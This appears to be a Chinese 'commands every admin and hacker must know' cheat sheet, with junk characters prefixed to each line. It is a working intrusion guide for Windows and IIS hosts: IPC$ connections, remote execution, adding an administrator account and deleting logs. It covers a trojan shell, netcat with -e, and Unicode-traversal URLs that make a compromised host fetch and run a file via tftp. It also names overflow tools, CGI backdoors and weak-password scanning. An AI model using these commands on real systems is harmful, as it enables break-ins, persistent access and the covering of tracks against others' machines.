网管和黑客都必须知道的命令
njIvVs`q 常用的几条NET命令:
Pk,^q8; #qPk ,a (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
C?|gf?1p >!$4nxq2> (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
us]ah~U6A xj}N;FWo (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
7yc:=^ ) ?]})Xf.A (查看远程主机时间) net time \\IP地址
[AU1JO`\" M:x8]TA (定时启动某个程序) at \\IP地址 02:18 readme.exe
jJf|Ok:G{ DJbj@ 2W[ (查看共享) net view \\IP地址
(/)JnBy0 !87ebo (查看netbios工作组列表) nbtstat -A IP地址
cz0tnF*& >#'6jm (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
b/ynCf8X bi5'- .B
(这两条把自己增加到管理员组): net user 用户名 密码 /add
u&<LW4 iZ58;` net localgroup Administrators 用户名 /add
ZpZ~[BtQ mdk:2ndP (断开连接) net use \\IP地址\ipc$ /delete
^^[,aBu l/`Z+]; 扫尾:
cx$Oh`-Car vb%\q sf del C:\winnt\system32\logfiles\*.*
tpVtbh1)u ]6nF>C-C del C:\winnt\ssytem32\config\*.evt
VTF),e! )j$Bo{ del C:\winnt\system32\dtclog\*.*
_WkK%RYV ^yX
W.s del C:\winnt\system32\*.log
:!|xg!|y (R0 del C:\winnt\system32\*.txt
H'Po LWW0lG!_F del C:\winnt\*.txt
Wbc %G8 mX#T<_=d del C:\winnt\*.log
zR/ATm]9 <sPB|5Ak 一、netsvc.exe
Z?b.
PC/ ~E)I+$, 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
a{HvrWs?Q u_uC78`p netsvc /list \\IP地址
)I*V('R6| 86I".R$d netsvc schedule \\IP地址 /query
I[R?j?$}> E{FN sa netsvc \\IP地址 schedule /start
y_'8m9Qy) WgY3g1C 二、OpenTelnet.exe
n"Ev25% ?6[>HX; 远程启动主机的Telnet服务,并绑定端口到7878,例如:
RpreW7B_Q* ]\GGC]:\@
OpenTelnet \\IP地址 用户名 密码 1 7878
]s u\[?l ^awl-CG 然后就可以telnet到主机的7878端口,进入DOS方式下:
f5O*Njl Z8:iaP) telnet IP地址 7878
`=.{i}V `aC#s3[ 三、winshell.exe
4iKT wOOPuCw? 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
k<St:X%.O ;mMn-+ 3< p Path (查看winshell主程序的路径信息)
C|>#|5XaF %xY'v$
% b reBoot (重新启动机器)
F:\y#U6"J tvg7mU]l d shutDown (关闭机器)
UH)A n:9 Z(V4"x7F s Shell (执行后你就会看到可爱的“C:\>”)
pIh@!C } wiq?dr x eXit (退出本次登录会话,此命令并不终止winshell的运行)
>si<VCO 2Aff3]-:Gd CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
<|.M]]}j kQj8;LU 四、3389登陆器,GUI方式登录远程主机的
r[hfN2,# d29]R. 五、elsave.exe
|#S!qnXB f+)F-3 事件日志清除工具
"=qdBG9 Q@M,:0+cy elsave -s \\IP地址 -l "application" -C
Q.5a"(d@ ov|s5yH8e elsave -s \\IP地址 -l "system" -C
7%o\O{,U -
@ elsave -s \\IP地址 -l "security" -C
b]J_R"} (5atU |8r 执行后成功清除应用程序日志,系统日志,安全日志
NE/3aU ]ao]?=q C 六、hbulot.exe
\ii^F?+b ((H}d?^AJ 开启win2kserver和winxp的3389服务
5:YtBdP }U8H4B~UtY hbulot [/r]
+pDuRr XX/cJp 使用/r表示安装完成后自动重起目标使设置生效。
f}@]dF r d`2VbZC` 七、nc.exe(netcat.exe)
=!p6}5Z YWm:#{n. 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
Ble <n6 Ex~OT 想要连接到某处: nc [-options] hostname port[s] [ports] ...
1tD4I e#08,wgW 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
`f b}cJUa s'i1!GNF
B 参数:
jtd{=[STU \n /_Px -e prog 程序重定向,一旦连接,就执行 [危险!!]
[t0gX dU6 5~ jGF -g gateway source-routing hop point[s], up to 8
m+1MoeR
^d!-IL_ -G num source-routing pointer: 4, 8, 12, ...
>WDb89kC= q~a6ES_lA -h 帮助信息
c.NAUe_3 '!Q[+@$ -i secs 延时的间隔
rJR"[TTJ n#m )]YQC -l 监听模式,用于入站连接
u dH7Q&" d]+g3oy
` -n 指定数字的IP地址,不能用hostname
FCOSgEU "4I`.$F%O( -o file 记录16进制的传输
3:S
Ex;d+ V}3.K\7 -p port 本地端口号
=7Nm=5@ ;@Ls"+g -r 任意指定本地及远程端口
uI+h9j$vS (3W<yAM+ -s addr 本地源地址
[ UQzCqV *-gS u -u UDP模式
)=8X[<^i _4.fT -v 详细输出——用两个-v可得到更详细的内容
j#o0y5S qA&N6` -w secs timeout的时间
t R*JM$T Z~$fTW6g -z 将输入输出关掉——用于扫描时
FJ~Dg3F1 八、TFTPD32.EXE
VNaa(Q -<qci3Ba} 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
U
JY`P4( $T~|@XH http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
\O@,v0?R :h?Zg(l 然后可以直接令文件运行:
\9<aCJxN mM>{^%2Q: http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
hO\_RhsRy? YQ2ie>C8 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
*O+YhoR? ,HR~oT^ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
~[l2"@ C$Ldz=d 一、一 Xscan命令行运行参数说明:
|f.=Y~aY Trm)7B* 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
\O`B@!da~ |Q.t]TR'P 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
w#]%I+ mG\,T3/* xscan -file <主机列表文件名> <检测项目> [其他选项]
hyFq>XFo TRG"fVR 其中<检测项目> 含义如下:
GIt;Y m?bb/o'B -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
5"k_Ms7R, vY6eg IO -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
;?bRRW *p p1U>, -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
eQJLyeR+ R7( + ^% -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
lB.P
U*1rA/"n -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
rB)m{) 'GS1"rkW<5 [其他选项] 含义如下:
A\k@9w\Ll; % ;09J -v: 显示详细扫描进度
-Z)$].~|t ct fKxGH -p: 跳过Ping不通的主机
DSD#', \snbU'lfP -o: 跳过没有检测到开放端口的主机
H>a3\M
VTy!<I -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10